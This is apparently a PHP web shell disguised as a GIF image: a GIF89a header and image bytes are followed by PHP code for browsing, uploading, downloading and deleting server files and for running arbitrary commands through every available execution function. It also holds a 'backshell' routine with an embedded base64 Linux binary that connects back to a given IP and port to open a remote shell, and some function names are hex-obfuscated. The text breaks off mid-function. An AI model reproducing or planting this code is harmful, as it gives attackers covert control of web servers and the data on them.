GIF89aJZtfwkcwkcvdZ޲eZRدӲ`wףѤRbΞΔΆsSaJhAŅŭv产JBZ?ŽѺTB̽sֺ`κ~ֽ9ּBȸf˸Z̹BޫζLֵ:ͷ:z͵1{XOc֭?yݦ^֭1ǭMfŭB\ǭ0ŭ:J@Wܗuǥ,ʠVA//˜?Qǜ,wg̙3VeB,?,T{gF,ބBzCˉ/~&s.rmgB(Zs?v,{Bmp'ꇎ5$f! 1 1J—dbRt(3Kx`G̀!]qdGR@9!9`-dÿIwwm8Q-~%mp{m?$+AW0dL A8 APTAvS u9k]WCL`B+| xPu)CPS2wkyuJXAs)އvg U0ޙt Dy27+p ^|y -$O'x dzVo<D'ԧAN :o;`<xTc?HP d;㷮 v$57 (`2hms5N&bpt&HѼA9H!&4nT ^M =K NBn5 P<89J0$X 0Z8+bvAG0╻Q-H&f Xh,@nr@)`9(idcPTwxF6,FH [9@(pAʌB [҈cg&9IZ2#,X}laE():N&Bp@B"I*:nCpQF0PP/Mo t HAa AHx@d#܇2C6/PV@JQ#?-F5ry@X ^XBπ@ )ЙDBShI-?›y,-2u 㕟F7"؟=>m2K05V>EBj\4& -9O*V\^-rs}xayF-$B=/;6WPEpل=AQމ3`XcY]=)\PFI0(q!/gFG̱n=R;(#sdۥѐ6jn&$A|VaZWA5DŞ}hECK%R$qPdq `wHF8 }A)WD ]`DPx|cK6nG"3Pru1d8hcFŅqxg!apwoem;gqG`t(, #Ñ_lIČxAXXtrbG\FϠ^ZF=x24A\lVbi'W k5Fb I@fN}tVwﵐlI@]~ԇ6yPkw](IWLiv+Q8<plHiJiAuoRU(W@PmKiiDUPwP{cRp谖li PSSÆԓI%p6 jgx Q6^!\^5?w,5šN};eP4bSy^{& 1<Ձ(rb5X,sTS m;xW۠"! ,JX H JIȰÇ bHŃ.Z,p'5kRmшpawFTCL9^D$5wo{0DڿZRyDs& <ų3ݻ:oT`ʞ9ԜTKo_gREw &b26ty)l?5 V ϥ;3#܄k )&5@(d9qNlvh&6{oW?k=*Qwkec,8L1cE?1X?hD (D,5$"8CU}'{4'ƨE fhDg2 Ob ,rE"H!x Bv%b}}'\⡣Ҙ r|8ua$@Jm p U4#AHkZ`Byh~2t|qC/R5- N<"$"mNNfX2$H,"pFG!  R0 et&R{e"$0B#&MoNQÂ4-(C3V)#> ޫv+wZ(#KCTDD 1^';n?vCH bl_ Ѐcad Bl}5 DayqQ9-oQ : (E0lc !@QI<ѐ'MJ[ҿq47/Ms ;"tԨ>P!NzjYCֶεw^W! ,JW HVPÇ#ċ Pf  $zH5?ޕT$-%<'Q$&*Κm.͌ՔStQ k=Kt'ѨT%]) rr.mQ$V3k2+mϪC,XQ`zGN>W}XD#qAt۬) jTye tە8?֮S+"SI!X`wߡ,@乕clߩ&+RD$^;>ye]-S/r߽ʵYx 8"mwPs{)u6Ov2ym8>弃a0ȡALM8Y6w8֨YU(i?|dn @$ܲ-4 ?Ts@Bs|P 90DN hX%p +@SerK& ta@Q-p@ f6 9Pc@t@"888_THp$?Y@PR -i?ԃ1ƚ@0AB0 ^ t v5OC ?.`SF0p)pA`X0qkZp b<@\?$.WH0ۼ3:p@ ZF dL =lѫM` S qH0f@$x*Ԓ5`CH1>$'[.t"Cp 6 ͣ1;RCoq[9ʤE @q&8A8XcXx@CxC,"3$c?~7BRD :8:瘀@.8X)C*@&Ȃ9@` Y&-pkSFG$`1xXJA_5ĉ =~b8?L1_t":|5x @Ag!(PCUIB҃9?g0u6 IBb wxH\jњQx '1cְ?ȠT r @ZK-AK(0Ib.D`8DawjZɆ0hl 8Υr`@:z|I^ `*=z[ 1@, q(=̉XZl!Z*)Bb&~Kga hE dT5ђF/;,nE8ʁ^' dҰDAp`;ň0 kdu!6 S(Bt1 AaTOM<p  : 7KQ ) SbzG% oi 1 H E R~,&B}2jQ m`DCOHAXFRu[Q-HlHmZڋ<=@jz7уL*ҙc-G @ېXnC0.j"z|wH3: w@&'î=`"kIDvrUpf%jKcQX"^|l#Epsa D,r%ً{r#)9H궱2o#OȂ٬ݥ#f6>/; ?RuЕy^$(ָNh(c5e;&=LͣygMZ_A()Q{RBa5f3_KsAc :ufsiMq>D! ,JU H nIȰa J$nńE\*4E`Y3to޳!)C04g޳m0aUK85,MBjΜܻ}FTcLj{fmۼL%!{AmSVkRea ؖ(Z> ZS A&Ĵgʂ¤&=:6rx{'W3< a}9ը;Iނpip#|쟇 T}AykƔh^ rWJ wc֜=1b te<ps(? ^\Y- bgbI sY0@l;t@NM;.ZI4X :TÏL^@PLMV@Utce)Е`b%x7? g B%l B& BY6P\) )fN嬧^S9PM5hk^In8tGS}&f P =Jh<:Q-kNh# 4?G0o" %B?#5Q ˺"N5) JiK3oK"@BCDTlH `78R5%f#g2I@!(F0R,e,8EC!t@ H.w^(E<5q@JA,8D)D 8rCH0=ļ>y?Lƛ[(G'9#`"ȁwf ʣEp sy}8d@ G' ey\1HE` =gSݤQ`XLmL0'(r.HE"*! kH?J!N&He9p$e @*G% 9/Ƙ{5 S @ 8Eу!0=N^oM&Hؙ9[p4FQhن"# "j^*?t*va}C4()Y y{.;!4k>H> 0Q !2D( 0RܯrʈH-j!)y!۵ &j:XI!={j8!ƬP@ޓl~yq㐼:La_(LZMZif IHgܤ [d.[&布"$&-G4*DX6K-XCVq-D`R[F FAL<ã20qł=[I@SP (E)w8tV=6Dҵεw^MbNf;Ў! ,CU H JIȰÇ AHb{3jw8H!Qx1׏48(SK-< : <@HF-L*lR12(w?$RCmNE sO9/Q İ&SA>D25北ʤ2 &LZ1NI CUihM-HCjPiW 5(YaN}CK^w$2O0lE8TP:6<nc6c&:}IZAlԒWN~yeF/HP9V ;"Y84R" 䧺DT@ҽHa\EP:N*(@|5<)Ca; N-R(LBC"3t6\ZĿ)<1d.d0J0L"WPA [:;7BDSi\w`-dmh'\@! ,JU H nW Ç#JnExQY,Rͻ߾w0Ui0?) y6OpP@hrYۆn_K}IpC5>}:oTѯDk=Kt'ѨT5h c^gx_Q$”ꟲg#X &,`Faݶw &lq{A5rB C͚`F @>l-+rhFڷsIu@L8%I!F9gu{&Z\I\>Eq'ڶHV>C46b?H6hQ6?1ˌO юOt A4Y\@xVR}JHм&Ȃ9āX ÀqqM-wAp2x`eX| ;0鹅q9"Ml;Z:0AS0RJPC \~A0A 4nCPу99d$'IJJ 0aA ;L)9k!"1@APPZ%\ 6]{C6)x$L2Ƀ-ψQFMjNig&! ?}DgKʈ> bQ~8O7ς[DY= R>k m`,:hvNjѣ |Ex; 98v09LmA 80($1e0<:ugh548(jA S!ޕAH+!#HBA ᔋFHx)|YgTTD#aA]``B &A_VU(B*Ny/KD̰!QB^B}5"dJ>[):St!5D҈i+B  pDԩН'&وrU)`"zclCք娽/0Ug繵f([`ltI !HxӞ@lSRЊ%?:j@ @*+7eK0Ո#a@a$҇@ÊeB!ЕS-@3/ Ur6 $xL*WJm!@-"ZG >Lq14r+L z<+%C>&dA=H?@@u 4 ),S" y4!rR xE )_cfbΌ:PAg<&`B7ƉwԢA=P$'H8wr b>D}C @0j-&@$ft&R pkHE 0S@8tH@ZܡR KnN\Z$B <n֜ɒMTSeDe*^Oб -xB "\Zlá><‰Ղ[-PI!(3Gzw(Ԡe2WenX'H<>A~EZyv|g`)OБJ!<- !2̲61H2&rb}xѷ-T$(!Ģ~9j5L¹ID| -:A&褌T_]#Vy(C [.AR `  D};g0!I 6g4iHFJ! #S\0$/3,cӟL2hN6%pLg4E^Bo>~~,WAy+ ! ,JX H nIȰÇ#JHE*hpaBJݾ}*±@kQ`RT]{{†p"ؼ}A2ȁJS`۞ w忖 y5rݻ7*Z54V0e϶xZ 0 hRa^*yXׯ2kLWlBp|d5 yso߿;`b5&5QT_翠ww)xkw{/<>t]'ҍ"nL}A_c9J6Iw/ܢ&#ul3U*` `@$r/47ЅLs"684ی"O]<8P !E*<~<&2( .C'^8FM`vэ $l)VE8&hA C\ `Ddy0Va?8q!<"s+ |I8a  4aNB9D=хig@ɰ# ( N 'VyYg?сcT ((BW! (AC֢aKTZL;*}F%g8tAQmPl@!`DੌR;!4X 5е!N+DXDJ>jm!AQT r)⁐THʌ+dHyU@be>$56Ip94C'=W5sJ 1˔ $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; } define('MYFILE', strdir(__FILE__)); define('THISDIR', strdir(dirname(MYFILE) . '/')); $rootdir = strdir(strtr(MYFILE, array( strdir($_SERVER['PHP_SELF']) => '' )) . '/'); $rootdir = strpos($rootdir, 'eval()') ? array_shift(explode('(', $rootdir)) : $rootdir; define('ROOTDIR', strdir($rootdir . '/')); define('EXISTS_PHPINFO', getinfo($password) ? true : false); if (get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); } if (function_exists('mysql_close')) { $issql = 'MySql'; } if (function_exists('mssql_close')) $issql .= ' - MsSql'; if (function_exists('oci_close')) $issql .= ' - Oracle'; if (function_exists('sybase_close')) $issql .= ' - SyBase'; if (function_exists('pg_close')) $issql .= ' - PostgreSql'; $win = substr(PHP_OS, 0, 3) == 'WIN' ? true : false; $msg = VERSION . ' - ' . date('Y-m-d H:i:s N', time()); function filew($filename, $filedata, $filemode) { if ((!is_writable($filename)) && file_exists($filename)) { chmod($filename, 0666); } $handle = fopen($filename, $filemode); $key = fputs($handle, $filedata); fclose($handle); return $key; } function filer($filename) { $handle = fopen($filename, 'r'); $filedata = fread($handle, filesize($filename)); fclose($handle); return $filedata; } function fileu($filenamea, $filenameb) { $key = move_uploaded_file($filenamea, $filenameb) ? true : false; if (!$key) { $key = copy($filenamea, $filenameb) ? true : false; } return $key; } function filed($filename) { if (!file_exists($filename)) return false; $name = basename($filename); $array = explode('.', $name); header('Content-type: application/x-' . array_pop($array)); header('Content-Disposition: attachment; filename=' . $name); header('Content-Length: ' . filesize($filename)); @readfile($filename); exit; } function showdir($dir) { $dir = strdir($dir . '/'); if (!is_readable($dir)) return false; $handle = opendir($dir); $array = array(); while ($name = readdir($handle)) { if ($name == '.' || $name == '..') continue; $path = $dir . $name; $name = strtr($name, array( '\'' => '%27', '"' => '%22' )); if (is_dir($path)) { $array['dir'][$path] = $name; } else { $array['file'][$path] = $name; } } closedir($handle); return $array; } function deltree($dir) { $handle = @opendir($dir); while ($name = @readdir($handle)) { if ($name == '.' || $name == '..') continue; $path = $dir . $name; @chmod($path, 0777); if (is_dir($path)) { deltree($path . '/'); } else { @unlink($path); } } @closedir($handle); return @rmdir($dir); } function postinfo($array) { $infos = array( function_exists("\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e"), function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e") ); } function size($bytes) { if ($bytes < 1024) return $bytes . ' B'; $array = array( 'B', 'K', 'M', 'G', 'T' ); $floor = floor(log($bytes) / log(1024)); return sprintf('%.2f ' . $array[$floor], ($bytes / pow(1024, floor($floor)))); } function find($array, $string) { foreach ($array as $key) { if (stristr($string, $key)) return true; } return false; } function scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now) { $handle = opendir($dir); while ($name = readdir($handle)) { if ($name == '.' || $name == '..') continue; $path = $dir . $name; if (is_dir($path)) { if ($fit && in_array($name, $fit)) continue; if ($ran == 0 && is_readable($path)) scanfile($path . '/', $key, $inc, $fit, $tye, $chr, $ran, $now); } else { if ($inc && (!find($inc, $name))) continue; $code = $tye ? filer($path) : $name; $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), 'M') ? false : (strpos($code, $key) > -1)); if ($find) { $file = strtr($path, array( $now => '', '\'' => '%27', '"' => '%22' )); echo ' ' . $path . '
'; flush(); ob_flush(); } unset($code); } } closedir($handle); return true; } function antivirus($dir, $exs, $matches, $now) { $handle = opendir($dir); while ($name = readdir($handle)) { if ($name == '.' || $name == '..') continue; $path = $dir . $name; if (is_dir($path)) { if (is_readable($path)) antivirus($path . '/', $exs, $matches, $now); } else { $iskill = NULL; foreach ($exs as $key => $ex) { if (find(explode('|', $ex), $name)) { $iskill = $key; break; } } if (strpos(size(filesize($path)), 'M')) continue; if ($iskill) { $code = filer($path); foreach ($matches[$iskill] as $matche) { $array = array(); preg_match($matche, $code, $array); if (strpos($array[0], '$this->') || strpos($array[0], '[$vars[')) continue; $len = strlen($array[0]); if ($len > 10 && $len < 150) { $file = strtr($path, array( $now => '', '\'' => '%27', '"' => '%22' )); echo ' ' . $path . '
'; flush(); ob_flush(); break; } } unset($code, $array); } } } closedir($handle); return true; } function command($cmd, $cwd, $com = false) { $iswin = substr(PHP_OS, 0, 3) == 'WIN' ? true : false; $res = $msg = ''; if ($cwd == 'com' || $com) { if ($iswin && class_exists('COM')) { $wscript = new COM('Wscript.Shell'); $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c ' . $cmd); $stdout = $exec->StdOut(); $res = $stdout->ReadAll(); $msg = 'Wscript.Shell'; } } else { chdir($cwd); $cwd = getcwd(); if (function_exists('exec')) { @exec($cmd, $res); $res = join("\n", $res); $msg = 'exec'; } elseif (function_exists('shell_exec')) { $res = @shell_exec($cmd); $msg = 'shell_exec'; } elseif (function_exists('system')) { ob_start(); @system($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; } elseif (function_exists('passthru')) { ob_start(); @passthru($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; } elseif (function_exists('popen')) { $fp = @popen($cmd, 'r'); if ($fp) { while (!feof($fp)) { $res .= fread($fp, 1024); } } @pclose($fp); $msg = 'popen'; } elseif (function_exists('proc_open')) { $env = $iswin ? array( 'path' => 'c:\\windows\\system32' ) : array( 'path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin' ); $des = array( 0 => array( "pipe", "r" ), 1 => array( "pipe", "w" ), 2 => array( "pipe", "w" ) ); $process = @proc_open($cmd, $des, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); } @proc_close($process); $msg = 'proc_open'; } } $msg = $res == '' ? '

NULL

' : '

' . $msg . 'ִгɹ

'; return array( 'res' => $res, 'msg' => $msg ); } function backshell($ip, $port, $dir, $type) { $key = false; $c_bin = 'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAYIQECDQAAACkCgAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIlAcAAJQHAAAFAAAAABAAAAEAAACUBwAAlJcECJSXBAggAQAAKAEAAAYAAAAAEAAAAgAAAKgHAAColwQIqJcECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAAGAAAACQAAAAIAAAANAAAAAQAAAAUAAAAAIAAgAAAAAA0AAACtS+PAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAdgAAABIAAABJAAAAAAAAAHkBAAASAAAAAQAAAAAAAAAAAAAAIAAAAFUAAAAAAAAAcgEAABIAAABqAAAAAAAAAJ8BAAASAAAANQAAAAAAAABZAQAAEgAAADsAAAAAAAAADgAAABIAAAApAAAAAAAAADwAAAASAAAAUAAAAAAAAAA9AAAAEgAAAF8AAAAAAAAAKwAAABIAAABkAAAAAAAAAG8AAAASAAAAMAAAAAAAAAD0AAAAEgAAABoAAAB4hwQIBAAAABEADgAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AF9JT19zdGRpbl91c2VkAHNvY2tldABleGl0AGV4ZWNsAGh0b25zAGNvbm5lY3QAZGFlbW9uAGR1cDIAaW5ldF9hZGRyAGF0b2kAY2xvc2UAX19saWJjX3N0YXJ0X21haW4AR0xJQkNfMi4wAAAAAgACAAAAAgACAAIAAgACAAIAAgACAAIAAQAAAAEAAQAQAAAAEAAAAAAAAAAQaWkNAAACAHwAAAAAAAAAcJgECAYDAACAmAQIBwEAAISYBAgHAgAAiJgECAcDAACMmAQIBwQAAJCYBAgHBQAAlJgECAcGAACYmAQIBwcAAJyYBAgHCAAAoJgECAcJAACkmAQIBwoAAKiYBAgHCwAArJgECAcMAABVieWD7AjoBQEAAOiMAQAA6KcDAADJwwD/NXiYBAj/JXyYBAgAAAAA/yWAmAQIaAAAAADp4P////8lhJgECGgIAAAA6dD/////JYiYBAhoEAAAAOnA/////yWMmAQIaBgAAADpsP////8lkJgECGggAAAA6aD/////JZSYBAhoKAAAAOmQ/////yWYmAQIaDAAAADpgP////8lnJgECGg4AAAA6XD/////JaCYBAhoQAAAAOlg/////yWkmAQIaEgAAADpUP////8lqJgECGhQAAAA6UD/////JayYBAhoWAAAAOkw////AAAAADHtXonhg+TwUFRSaLCGBAhowIYECFFWaDSFBAjoW/////SQkFWJ5VOD7AToAAAAAFuBw+QTAACLk/z///+F0nQF6Bb///9YW8nDkJCQkJCQVYnlU4PsBIA9uJgECAB1P7iglwQILZyXBAjB+AKNWP+htJgECDnDdh+NtCYAAAAAg8ABo7SYBAj/FIWclwQIobSYBAg5w3foxgW4mAQIAYPEBFtdw410JgCNvCcAAAAAVYnlg+wIoaSXBAiFwHQSuAAAAACFwHQJxwQkpJcECP/QycOQjUwkBIPk8P9x/FWJ5VdTUYPsPInLx0QkBAAAAADHBCQBAAAA6E/+//9mx0XgAgCLQwSDwAiLAIkEJOi5/v//D7fAiQQk6H7+//9miUXii0MEg8AEiwCJBCToOv7//4lF5ItDBIPABIsAuf////+JRdC4AAAAAPyLfdDyronI99CNUP+LQwSDwAiLALn/////iUXMuAAAAAD8i33M8q6JyPfQg+gBjQQCjVABi0MEg8AEiwCJx/yJ0bgAAAAA86rHRCQIBgAAAMdEJAQBAAAAxwQkAgAAAOj9/f//iUXwjUXgx0QkCBAAAACJRCQEi0XwiQQk6HD9//+FwHkMxwQkAAAAAOgQ/v//x0QkBAAAAACLRfCJBCTozf3//8dEJAQBAAAAi0XwiQQk6Lr9///HRCQEAgAAAItF8IkEJOin/f//x0QkCAAAAADHRCQEgIcECMcEJIaHBAjoW/3//4tF8IkEJOig/f//g8Q8WVtfXY1h/MOQkJCQkJCQkJBVieVdw410JgCNvCcAAAAAVYnlV1ZT6F4AAACBw6kRAACD7Bzom/z//42DIP///4lF8I2DIP///ylF8MF98AKLVfCF0nQrMf+Jxo22AAAAAItFEIPHAYlE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3AAAAJSXBAgAAAAAAAIQAO0AAAB0mAQIAAAAAAECFQADAQAAlJcECAAAAAAAAhAAFwEAAJSXBAgAAAAAAAIQACoBAACUlwQIAAAAAAACEAA7AQAAlJcECAAAAAAAAhAATgEAAKiXBAgAAAAAAQITAFcBAACwmAQIAAAAACAAFgBiAQAAAAAAAHYAAAASAAAAdQEAAAAAAAB5AQAAEgAAAIcBAACwhgQIBQAAABIADACXAQAAYIQECAAAAAASAAwAngEAAAAAAAAAAAAAIAAAAK0BAAAAAAAAAAAAACAAAADBAQAAdIcECAQAAAARAA4AyAEAAFiHBAgAAAAAEgANAM4BAAAAAAAAcgEAABIAAADjAQAAAAAAAJ8BAAASAAAAAAIAAAAAAABZAQAAEgAAABECAAAAAAAADgAAABIAAAAiAgAAeIcECAQAAAARAA4AMQIAALCYBAgAAAAAEAAWAD4CAAAAAAAAPAAAABIAAABQAgAAAAAAAD0AAAASAAAAYAIAAHyHBAgAAAAAEQIOAG0CAACglwQIAAAAABECEQB6AgAAwIYECGkAAAASAAwAigIAAAAAAAArAAAAEgAAAJoCAAAAAAAAbwAAABIAAACrAgAAtJgECAAAAAAQAPH/twIAALyYBAgAAAAAEADx/7wCAAC0mAQIAAAAABAA8f/DAgAAAAAAAPQAAAASAAAA0wIAACmHBAgAAAAAEgIMAOoCAAA0hQQIcwEAABIADADvAgAAdIMECAAAAAASAAoAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AZHRvcl9pZHguNTc5MwBjb21wbGV0ZWQuNTc5MQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGJjLmMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZmluaV9hcnJheV9lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA=='; switch ($type) { case "pl": $shell = 